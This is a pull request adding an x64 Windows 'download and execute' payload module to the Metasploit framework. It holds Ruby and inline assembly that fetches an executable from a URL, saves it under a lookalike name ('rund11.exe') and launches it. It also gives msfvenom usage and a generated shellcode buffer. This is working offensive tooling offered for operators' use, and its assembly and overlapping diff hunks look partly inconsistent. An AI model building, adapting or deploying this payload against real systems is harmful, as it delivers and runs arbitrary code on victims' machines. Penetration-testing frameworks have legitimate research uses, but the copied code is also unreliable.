### PR TITLE
Converted the download_exec windows payload to support x64 (Fixes Issue #12876)

### DIFF
--- a/modules/payloads/singles/windows/x64/download_exec.rb
+++ b/modules/payloads/singles/windows/x64/download_exec.rb
@@ -9,7 +9,7 @@ module MetasploitModule
   
     include Msf::Payload::Windows
     include Msf::Payload::Single
-    include Msf::Payload::Windows::BlockApi
+    include Msf::Payload::Windows::BlockApi_x64
   
     def initialize(info = {})
       super(merge_info(info,

--- a/modules/payloads/singles/windows/x64/download_exec.rb
+++ b/modules/payloads/singles/windows/x64/download_exec.rb
@@ -2,210 +2,225 @@
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
+require 'uri'
 
 module MetasploitModule
 
-    CachedSize = 443
-  
-    include Msf::Payload::Windows
-    include Msf::Payload::Single
-    include Msf::Payload::Windows::BlockApi_x64
-  
-    def initialize(info = {})
-      super(merge_info(info,
-        'Name'          => 'Windows x64 Executable Download (http,https,ftp) and Execute',
-        'Description'   => 'Download an EXE from an HTTP(S)/FTP URL and execute it',
-        'Author'        =>
-          [
-            'corelanc0d3r <peter.ve[at]corelan.be>', # Original x86
-            'itsmrmonday mrmonday[at]itsmrmonday.com (x64 adaptation)'
-          ],
-        'License'       => MSF_LICENSE,
-        'Platform'      => 'win',
-        'Arch'          => ARCH_X64
-      ))
-  
-      # Register command execution options
-      register_options(
+  CachedSize = 526
+
+  include Msf::Payload::Windows
+  include Msf::Payload::Single
+  include Msf::Payload::Windows::BlockApi_x64
+
+  def valid_url(url)
+    begin
+      uri = URI.parse(url)
+      return uri.kind_of?(URI::HTTP) || uri.kind_of?(URI::HTTPS) || uri.kind_of?(URI::FTP)
+    rescue URI::InvalidURIError
+      return false
+    end
+  end
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'Windows x64 Executable Download (http,https,ftp) and Execute',
+      'Description'   => 'Download an EXE from an HTTP(S)/FTP URL and execute it',
+      'Author'        =>
         [
-          OptString.new('URL', [true, "The pre-encoded URL to the executable", "https://localhost:443/evil.exe"]),
-          OptString.new('EXE', [true, "Filename to save & run executable on target system", "rund11.exe"])
-        ])
+          'corelanc0d3r <peter.ve[at]corelan.be>', # Original x86
+          'itsmrmonday <mrmonday[at]itsmrmonday.com> (x64 adaptation)'
+        ],
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'win',
+      'Arch'          => ARCH_X64
+    ))
+
+    # Register command execution options
+    register_options(
+      [
+        OptString.new('URL', [true, "The pre-encoded URL to the executable", "https://localhost:443/evil.exe"]),
+        OptString.new('EXE', [true, "Filename to save & run executable on target system", "rund11.exe"])
+      ])
+  end
+
+  #
+  # Construct the payload
+  #
+  def generate(_opts = {})
+
+    target_uri = datastore['URL'] || ""
+    filename = datastore['EXE'] || ""
+
+    unless valid_url(target_uri)
+      print_error("Invalid URL")
+      return nil
     end
-  
-    #
-    # Construct the payload
-    #
-    def generate(_opts = {})
-  
-      target_uri = datastore['URL'] || ""
-      filename = datastore['EXE'] || ""
-      proto = "https"
-      dwflags_asm = "mov r9d, 0x08400000 ; dwFlags\n" 
-        # 0x80000000 | INTERNET_FLAG_RELOAD
-        # 0x04000000 | INTERNET_NO_CACHE_WRITE
-        # 0x00800000 | INTERNET_FLAG_SECURE
-        # 0x00200000 | INTERNET_FLAG_NO_AUTO_REDIRECT
-        # 0x00001000 | INTERNET_FLAG_IGNORE_CERT_CN_INVALID
-        # 0x00002000 | INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
-        # 0x00000200 ; INTERNET_FLAG_NO_UI
-  
-      exitfuncs = {
-        "THREAD"  => Rex::Text.block_api_hash("kernel32.dll", "ExitThread").to_i(16), # ExitThread
-        "PROCESS" => Rex::Text.block_api_hash("kernel32.dll", "ExitProcess").to_i(16), # ExitProcess
-        "SEH"     => 0x00000000,
-        "NONE"    => 0x00000000
-      }
-  
-      protoflags = {
-        "http"  => 0x3,
-        "https" => 0x3,
-        "ftp"   => 0x1
-      }
-  
-      exitfunc = datastore['EXITFUNC'].upcase
-  
-      if exitfuncs[exitfunc]
-        exitasm = case exitfunc
-          when "SEH" then "xor rax,rax\ncall rax"
-          when "NONE" then "jmp end"
-          else "xor r9d, r9d\nmov rcx, 0\nmov rdx, #{exitfuncs[exitfunc]}\ncall qword ptr [rbp-0x8]"
-        end
-      end
-  
-      # Parse URL to get:
-      # - Remote host
-      # - Port
-      # - /path/to/file
-      server_uri  = ''
-      server_host = ''
-      port_nr     = 443 # default
-  
-      if target_uri.length > 0
-  
-        if target_uri =~ /^http:/
-          proto = "http"
-          port_nr = 80
-          dwflags_asm = "mov r9d, 0x00400000 ; INTERNET_FLAG_KEEP_CONNECTION"
-        end
-  
-        if target_uri =~ /^ftp:/
-          proto = "ftp"
-          port_nr = 21
-          dwflags_asm = "mov r9d, 0x00200000"
-        end
-  
-        target_uri = target_uri.gsub('http://', '').gsub('https://', '').gsub('ftp://', '')
-  
-        server_info = target_uri.split("/")
-        server_parts = server_info[0].split(":")
-        if server_parts.length > 1
-          port_nr = Integer(server_parts[1])
-        end
-  
-        server_host = server_parts[0]
-        for i in (1..server_info.length - 1)
-          server_uri << "/"
-          server_uri << server_info[i]
-        end
-      end
-  
-      # x64 version of the payload
-      payload_data = %Q^
-        cld
-        call start
-        #{asm_block_api}
-      start:
-        pop rbp
-      load_wininet:
-        sub rsp, 32
-        mov rcx, 0x0074656e696e6977 ; "wininet"
-        push rcx
-        push rsp
-        mov rcx, rsp
-        mov rdx, #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
-        call qword ptr [rbp-0x8]
-        add rsp, 32
-  
-      internetopen:
-        xor rcx, rcx
-        mov rdx, rcx
-        mov r8, rcx
-        mov r9, rcx
-        lea rcx, [rsp+8]
-        mov rax, #{Rex::Text.block_api_hash('wininet.dll', 'InternetOpenA')}
-        call qword ptr [rbp-0x8]
-  
-      internetconnect:
-        lea rdx, [rsp+32]       ; host
-        mov r8d, #{port_nr}
-        xor r9d, r9d
-        mov [rsp+40], r9d
-        mov [rsp+48], r9d
-        mov [rsp+56], r9d
-        mov [rsp+64], #{protoflags[proto]}
-        mov [rsp+72], r9d
-        mov [rsp+80], rax
-        mov rax, #{Rex::Text.block_api_hash('wininet.dll', 'InternetConnectA')}
-        call qword ptr [rbp-0x8]
-  
-      httpopenrequest:
-        xor rcx, rcx
-        xor rdx, rdx
-        mov r8, rsp
-        xor r9d, r9d
-        mov [rsp+8], r9d
-        #{dwflags_asm}
-        mov rax, #{Rex::Text.block_api_hash('wininet.dll', 'HttpOpenRequestA')}
-        call qword ptr [rbp-0x8]
-  
-      httpsendrequest:
-        xor rcx, rcx
-        xor rdx, rdx
-        xor r8, r8
-        xor r9, r9
-        mov rax, #{Rex::Text.block_api_hash('wininet.dll', 'HttpSendRequestA')}
-        call qword ptr [rbp-0x8]
-  
-      create_file:
-        xor rcx, rcx
-        mov rdx, rsp
-        xor r8, r8
-        mov r9d, 2
-        mov [rsp+8], 2
-        xor rax, rax
-        mov [rsp+16], rax
-        mov [rsp+24], rax
-        mov [rsp+32], rax
-        mov rax, #{Rex::Text.block_api_hash('kernel32.dll', 'CreateFileA')}
-        call qword ptr [rbp-0x8]
-  
-      write_file:
-        mov rcx, rax
-        mov rdx, rbx
-        mov r8, rdi
-        lea r9, [rsp+8]
-        mov rax, #{Rex::Text.block_api_hash('kernel32.dll', 'WriteFile')}
-        call qword ptr [rbp-0x8]
-  
-      close_file:
-        mov rcx, rax
-        mov rax, #{Rex::Text.block_api_hash('kernel32.dll', 'CloseHandle')}
-        call qword ptr [rbp-0x8]
-  
-      execute_file:
-        lea rcx, [rsp+32]
-        xor rdx, rdx
-        mov r8, rdx
-        mov r9, rdx
-        mov rax, #{Rex::Text.block_api_hash('kernel32.dll', 'CreateProcessA')}
-        call qword ptr [rbp-0x8]
-  
-      thats_all_folks:
-        #{exitasm}
-      end:
-        ^
-        self.assembly = payload_data
-        super
+    proto = "https"
+    dwflags_asm = "mov r9d, 0x08400000 ; dwFlags\n" 
+      # 0x80000000 | INTERNET_FLAG_RELOAD
+      # 0x04000000 | INTERNET_NO_CACHE_WRITE
+      # 0x00800000 | INTERNET_FLAG_SECURE
+      # 0x00200000 | INTERNET_FLAG_NO_AUTO_REDIRECT
+      # 0x00001000 | INTERNET_FLAG_IGNORE_CERT_CN_INVALID
+      # 0x00002000 | INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
+      # 0x00000200 ; INTERNET_FLAG_NO_UI
+
+    exitfuncs = {
+      "THREAD"  => Rex::Text.block_api_hash("kernel32.dll", "ExitThread").to_i(16), # ExitThread
+      "PROCESS" => Rex::Text.block_api_hash("kernel32.dll", "ExitProcess").to_i(16), # ExitProcess
+      "SEH"     => 0x00000000,
+      "NONE"    => 0x00000000
+    }
+
+    protoflags = {
+      "http"  => 0x3,
+      "https" => 0x3,
+      "ftp"   => 0x1
+    }
+
+    exitfunc = datastore['EXITFUNC'].upcase
+
+    if exitfuncs[exitfunc]
+      exitasm = case exitfunc
+        when "SEH" then "xor rax,rax\ncall rax"
+        when "NONE" then "jmp end"
+        else "xor r9d, r9d\nmov rcx, 0\nmov rdx, #{exitfuncs[exitfunc]}\ncall qword ptr [rbp-0x8]"
       end
     end
+
+    # Parse URL to get:
+    # - Remote host
+    # - Port
+    # - /path/to/file
+    server_uri  = ''
+    server_host = ''
+    port_nr     = 443 # default
+
+    if target_uri.length > 0
+      
+      if target_uri =~ /^http:/
+        proto = "http"
+        port_nr = 80
+        dwflags_asm = "mov r9d, 0x00400000 ; INTERNET_FLAG_KEEP_CONNECTION"
+      end
+
+      if target_uri =~ /^ftp:/
+        proto = "ftp"
+        port_nr = 21
+        dwflags_asm = "mov r9d, 0x00200000"
+      end
+
+      target_uri = target_uri.gsub('http://', '').gsub('https://', '').gsub('ftp://', '')
+
+      server_info = target_uri.split("/")
+      server_parts = server_info[0].split(":")
+      if server_parts.length > 1
+        port_nr = Integer(server_parts[1])
+      end
+
+      server_host = server_parts[0]
+      for i in (1..server_info.length - 1)
+        server_uri << "/"
+        server_uri << server_info[i]
+      end
+    end
+
+    # x64 version of the payload
+    payload_data = %Q^
+      cld
+      call start
+      #{asm_block_api}
+    start:
+      pop rbp
+    load_wininet:
+      sub rsp, 32
+      mov rcx, 0x0074656e696e6977 ; "wininet"
+      push rcx
+      push rsp
+      mov rcx, rsp
+      mov rdx, #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
+      call qword ptr [rbp-0x8]
+      add rsp, 32
+
+    internetopen:
+      xor rcx, rcx
+      mov rdx, rcx
+      mov r8, rcx
+      mov r9, rcx
+      lea rcx, [rsp+8]
+      mov rax, #{Rex::Text.block_api_hash('wininet.dll', 'InternetOpenA')}
+      call qword ptr [rbp-0x8]
+
+    internetconnect:
+      lea rdx, [rsp+32]       ; host
+      mov r8d, #{port_nr}
+      xor r9d, r9d
+      mov [rsp+40], r9d
+      mov [rsp+48], r9d
+      mov [rsp+56], r9d
+      mov [rsp+64], #{protoflags[proto]}
+      mov [rsp+72], r9d
+      mov [rsp+80], rax
+      mov rax, #{Rex::Text.block_api_hash('wininet.dll', 'InternetConnectA')}
+      call qword ptr [rbp-0x8]
+
+    httpopenrequest:
+      xor rcx, rcx
+      xor rdx, rdx
+      mov r8, rsp
+      xor r9d, r9d
+      mov [rsp+8], r9d
+      #{dwflags_asm}
+      mov rax, #{Rex::Text.block_api_hash('wininet.dll', 'HttpOpenRequestA')}
+      call qword ptr [rbp-0x8]
+
+    httpsendrequest:
+      xor rcx, rcx
+      xor rdx, rdx
+      xor r8, r8
+      xor r9, r9
+      mov rax, #{Rex::Text.block_api_hash('wininet.dll', 'HttpSendRequestA')}
+      call qword ptr [rbp-0x8]
+
+    create_file:
+      xor rcx, rcx
+      mov rdx, rsp
+      xor r8, r8
+      mov r9d, 2
+      mov [rsp+8], 2
+      xor rax, rax
+      mov [rsp+16], rax
+      mov [rsp+24], rax
+      mov [rsp+32], rax
+      mov rax, #{Rex::Text.block_api_hash('kernel32.dll', 'CreateFileA')}
+      call qword ptr [rbp-0x8]
+
+    write_file:
+      mov rcx, rax
+      mov rdx, rbx
+      mov r8, rdi
+      lea r9, [rsp+8]
+      mov rax, #{Rex::Text.block_api_hash('kernel32.dll', 'WriteFile')}
+      call qword ptr [rbp-0x8]
+
+    close_file:
+      mov rcx, rax
+      mov rax, #{Rex::Text.block_api_hash('kernel32.dll', 'CloseHandle')}
+      call qword ptr [rbp-0x8]
+
+    execute_file:
+      lea rcx, [rsp+32]
+      xor rdx, rdx
+      mov r8, rdx
+      mov r9, rdx
+      mov rax, #{Rex::Text.block_api_hash('kernel32.dll', 'CreateProcessA')}
+      call qword ptr [rbp-0x8]
+
+    thats_all_folks:
+      #{exitasm}
+    end:
+      ^
+      self.assembly = payload_data
+      super
+    end
+  end

--- a/modules/payloads/singles/windows/x64/download_exec.rb
+++ b/modules/payloads/singles/windows/x64/download_exec.rb
@@ -1,0 +1,211 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+module MetasploitModule
+
+    CachedSize = 443
+  
+    include Msf::Payload::Windows
+    include Msf::Payload::Single
+    include Msf::Payload::Windows::BlockApi
+  
+    def initialize(info = {})
+      super(merge_info(info,
+        'Name'          => 'Windows x64 Executable Download (http,https,ftp) and Execute',
+        'Description'   => 'Download an EXE from an HTTP(S)/FTP URL and execute it',
+        'Author'        =>
+          [
+            'corelanc0d3r <peter.ve[at]corelan.be>', # Original x86
+            'itsmrmonday mrmonday[at]itsmrmonday.com (x64 adaptation)'
+          ],
+        'License'       => MSF_LICENSE,
+        'Platform'      => 'win',
+        'Arch'          => ARCH_X64
+      ))
+  
+      # Register command execution options
+      register_options(
+        [
+          OptString.new('URL', [true, "The pre-encoded URL to the executable", "https://localhost:443/evil.exe"]),
+          OptString.new('EXE', [true, "Filename to save & run executable on target system", "rund11.exe"])
+        ])
+    end
+  
+    #
+    # Construct the payload
+    #
+    def generate(_opts = {})
+  
+      target_uri = datastore['URL'] || ""
+      filename = datastore['EXE'] || ""
+      proto = "https"
+      dwflags_asm = "mov r9d, 0x08400000 ; dwFlags\n" 
+        # 0x80000000 | INTERNET_FLAG_RELOAD
+        # 0x04000000 | INTERNET_NO_CACHE_WRITE
+        # 0x00800000 | INTERNET_FLAG_SECURE
+        # 0x00200000 | INTERNET_FLAG_NO_AUTO_REDIRECT
+        # 0x00001000 | INTERNET_FLAG_IGNORE_CERT_CN_INVALID
+        # 0x00002000 | INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
+        # 0x00000200 ; INTERNET_FLAG_NO_UI
+  
+      exitfuncs = {
+        "THREAD"  => Rex::Text.block_api_hash("kernel32.dll", "ExitThread").to_i(16), # ExitThread
+        "PROCESS" => Rex::Text.block_api_hash("kernel32.dll", "ExitProcess").to_i(16), # ExitProcess
+        "SEH"     => 0x00000000,
+        "NONE"    => 0x00000000
+      }
+  
+      protoflags = {
+        "http"  => 0x3,
+        "https" => 0x3,
+        "ftp"   => 0x1
+      }
+  
+      exitfunc = datastore['EXITFUNC'].upcase
+  
+      if exitfuncs[exitfunc]
+        exitasm = case exitfunc
+          when "SEH" then "xor rax,rax\ncall rax"
+          when "NONE" then "jmp end"
+          else "xor r9d, r9d\nmov rcx, 0\nmov rdx, #{exitfuncs[exitfunc]}\ncall qword ptr [rbp-0x8]"
+        end
+      end
+  
+      # Parse URL to get:
+      # - Remote host
+      # - Port
+      # - /path/to/file
+      server_uri  = ''
+      server_host = ''
+      port_nr     = 443 # default
+  
+      if target_uri.length > 0
+  
+        if target_uri =~ /^http:/
+          proto = "http"
+          port_nr = 80
+          dwflags_asm = "mov r9d, 0x00400000 ; INTERNET_FLAG_KEEP_CONNECTION"
+        end
+  
+        if target_uri =~ /^ftp:/
+          proto = "ftp"
+          port_nr = 21
+          dwflags_asm = "mov r9d, 0x00200000"
+        end
+  
+        target_uri = target_uri.gsub('http://', '').gsub('https://', '').gsub('ftp://', '')
+  
+        server_info = target_uri.split("/")
+        server_parts = server_info[0].split(":")
+        if server_parts.length > 1
+          port_nr = Integer(server_parts[1])
+        end
+  
+        server_host = server_parts[0]
+        for i in (1..server_info.length - 1)
+          server_uri << "/"
+          server_uri << server_info[i]
+        end
+      end
+  
+      # x64 version of the payload
+      payload_data = %Q^
+        cld
+        call start
+        #{asm_block_api}
+      start:
+        pop rbp
+      load_wininet:
+        sub rsp, 32
+        mov rcx, 0x0074656e696e6977 ; "wininet"
+        push rcx
+        push rsp
+        mov rcx, rsp
+        mov rdx, #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
+        call qword ptr [rbp-0x8]
+        add rsp, 32
+  
+      internetopen:
+        xor rcx, rcx
+        mov rdx, rcx
+        mov r8, rcx
+        mov r9, rcx
+        lea rcx, [rsp+8]
+        mov rax, #{Rex::Text.block_api_hash('wininet.dll', 'InternetOpenA')}
+        call qword ptr [rbp-0x8]
+  
+      internetconnect:
+        lea rdx, [rsp+32]       ; host
+        mov r8d, #{port_nr}
+        xor r9d, r9d
+        mov [rsp+40], r9d
+        mov [rsp+48], r9d
+        mov [rsp+56], r9d
+        mov [rsp+64], #{protoflags[proto]}
+        mov [rsp+72], r9d
+        mov [rsp+80], rax
+        mov rax, #{Rex::Text.block_api_hash('wininet.dll', 'InternetConnectA')}
+        call qword ptr [rbp-0x8]
+  
+      httpopenrequest:
+        xor rcx, rcx
+        xor rdx, rdx
+        mov r8, rsp
+        xor r9d, r9d
+        mov [rsp+8], r9d
+        #{dwflags_asm}
+        mov rax, #{Rex::Text.block_api_hash('wininet.dll', 'HttpOpenRequestA')}
+        call qword ptr [rbp-0x8]
+  
+      httpsendrequest:
+        xor rcx, rcx
+        xor rdx, rdx
+        xor r8, r8
+        xor r9, r9
+        mov rax, #{Rex::Text.block_api_hash('wininet.dll', 'HttpSendRequestA')}
+        call qword ptr [rbp-0x8]
+  
+      create_file:
+        xor rcx, rcx
+        mov rdx, rsp
+        xor r8, r8
+        mov r9d, 2
+        mov [rsp+8], 2
+        xor rax, rax
+        mov [rsp+16], rax
+        mov [rsp+24], rax
+        mov [rsp+32], rax
+        mov rax, #{Rex::Text.block_api_hash('kernel32.dll', 'CreateFileA')}
+        call qword ptr [rbp-0x8]
+  
+      write_file:
+        mov rcx, rax
+        mov rdx, rbx
+        mov r8, rdi
+        lea r9, [rsp+8]
+        mov rax, #{Rex::Text.block_api_hash('kernel32.dll', 'WriteFile')}
+        call qword ptr [rbp-0x8]
+  
+      close_file:
+        mov rcx, rax
+        mov rax, #{Rex::Text.block_api_hash('kernel32.dll', 'CloseHandle')}
+        call qword ptr [rbp-0x8]
+  
+      execute_file:
+        lea rcx, [rsp+32]
+        xor rdx, rdx
+        mov r8, rdx
+        mov r9, rdx
+        mov rax, #{Rex::Text.block_api_hash('kernel32.dll', 'CreateProcessA')}
+        call qword ptr [rbp-0x8]
+  
+      thats_all_folks:
+        #{exitasm}
+      end:
+        ^
+        self.assembly = payload_data
+        super
+      end
+    end

--- a/modules/payloads/singles/windows/x64/download_exec.rb
+++ b/modules/payloads/singles/windows/x64/download_exec.rb
@@ -220,7 +220,7 @@ module MetasploitModule
       #{exitasm}
     end:
       ^
-      self.assembly = payload_data
-      super
-    end
+    self.assembly = payload_data
+    super
   end
+end


### PR DESCRIPTION
Fixes #12876

The commit used the windows download_exec payload as a reference (x86), I figured that it would be useful to other operators to have a x64 variant of the payload

# Verification
Its a simple drop in place payload, copy it over to the payloads/singles/windows/x64 directory and in my case run:
- [ ] `reload_all`

From here you should have the payload loaded, to generate a sample you may run:
- [ ] `use payload/windows/x64/download_exec`
- [ ] `set EXE <executable name to drop on disk>`
- [ ] `set URL <endpoint of hosted PE file>`
- [ ] `(OPTIONAL) set EXITFUNC <seh/thread/process/none>`
- [ ] `generate`

The module does not exploit anything, it simply drops a PE file on disk and calls CreateProcessA to spawn a process

Here is an example usage:
```console
msf6 > use windows/x64/download_exec
msf6 payload(windows/x64/download_exec) > set EXE test.exe
EXE => test.exe
msf6 payload(windows/x64/download_exec) > set URL https://example.com/test.exe
URL => https://example.com/test.exe
msf6 payload(windows/x64/download_exec) > set EXITFUNC thread
EXITFUNC => thread
msf6 payload(windows/x64/download_exec) > generate
# windows/x64/download_exec - 526 bytes
# https://metasploit.com/
# VERBOSE=false, PrependMigrate=false, EXITFUNC=thread,
# URL=https://example.com/test.exe, EXE=test.exe
buf =
"\xfc\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48" +
"\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52" +
"\x20\x48\x0f\xb7\x4a\x4a\x48\x8b\x72\x50\x4d\x31\xc9\x48" +
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" +
"\x01\xc1\xe2\xed\x52\x48\x8b\x52\x20\x41\x51\x8b\x42\x3c" +
"\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f\x85\x72\x00\x00" +
"\x00\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" +
"\xd0\x50\x44\x8b\x40\x20\x49\x01\xd0\x8b\x48\x18\xe3\x56" +
"\x4d\x31\xc9\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x48" +
"\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1" +
"\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40" +
"\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49" +
"\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e" +
"\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52" +
"\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4b\xff\xff\xff" +
"\x5d\x48\x83\xec\x20\x48\xb9\x77\x69\x6e\x69\x6e\x65\x74" +
"\x00\x51\x54\x48\x89\xe1\x48\xc7\xc2\x4c\x77\x26\x07\xff" +
"\x55\xf8\x48\x83\xc4\x20\x48\x31\xc9\x48\x89\xca\x49\x89" +
"\xc8\x49\x89\xc9\x48\x8d\x4c\x24\x08\x48\xb8\x3a\x56\x79" +
"\xa7\x00\x00\x00\x00\xff\x55\xf8\x48\x8d\x54\x24\x20\x41" +
"\xb8\xbb\x01\x00\x00\x45\x31\xc9\x44\x89\x4c\x24\x28\x44" +
"\x89\x4c\x24\x30\x44\x89\x4c\x24\x38\x48\xc7\x44\x24\x40" +
"\x03\x00\x00\x00\x44\x89\x4c\x24\x48\x48\x89\x44\x24\x50" +
"\x48\xb8\x57\x89\x9f\xc6\x00\x00\x00\x00\xff\x55\xf8\x48" +
"\x31\xc9\x48\x31\xd2\x49\x89\xe0\x45\x31\xc9\x44\x89\x4c" +
"\x24\x08\x41\xb9\x00\x00\x40\x08\x48\xc7\xc0\xeb\x55\x2e" +
"\x3b\xff\x55\xf8\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d" +
"\x31\xc9\x48\xc7\xc0\x2d\x06\x18\x7b\xff\x55\xf8\x48\x31" +
"\xc9\x48\x89\xe2\x4d\x31\xc0\x41\xb9\x02\x00\x00\x00\x48" +
"\xc7\x44\x24\x08\x02\x00\x00\x00\x48\x31\xc0\x48\x89\x44" +
"\x24\x10\x48\x89\x44\x24\x18\x48\x89\x44\x24\x20\x48\xc7" +
"\xc0\xda\xf6\xda\x4f\xff\x55\xf8\x48\x89\xc1\x48\x89\xda" +
"\x49\x89\xf8\x4c\x8d\x4c\x24\x08\x48\xc7\xc0\x2d\x57\xae" +
"\x5b\xff\x55\xf8\x48\x89\xc1\x48\xc7\xc0\xc6\x96\x87\x52" +
"\xff\x55\xf8\x48\x8d\x4c\x24\x20\x48\x31\xd2\x49\x89\xd0" +
"\x49\x89\xd1\x48\xb8\x79\xcc\x3f\x86\x00\x00\x00\x00\xff" +
"\x55\xf8\x45\x31\xc9\x48\xc7\xc1\x00\x00\x00\x00\x48\xc7" +
"\xc2\xe0\x1d\x2a\x0a\xff\x55\xf8"
```

You may also use it with msfvenom to generate shellcode:
```console
msfvenom -p windows/x64/download_exec -f <output_fmt> EXE=<executable> URL=<url> EXITFUNC=<exitfunc>
```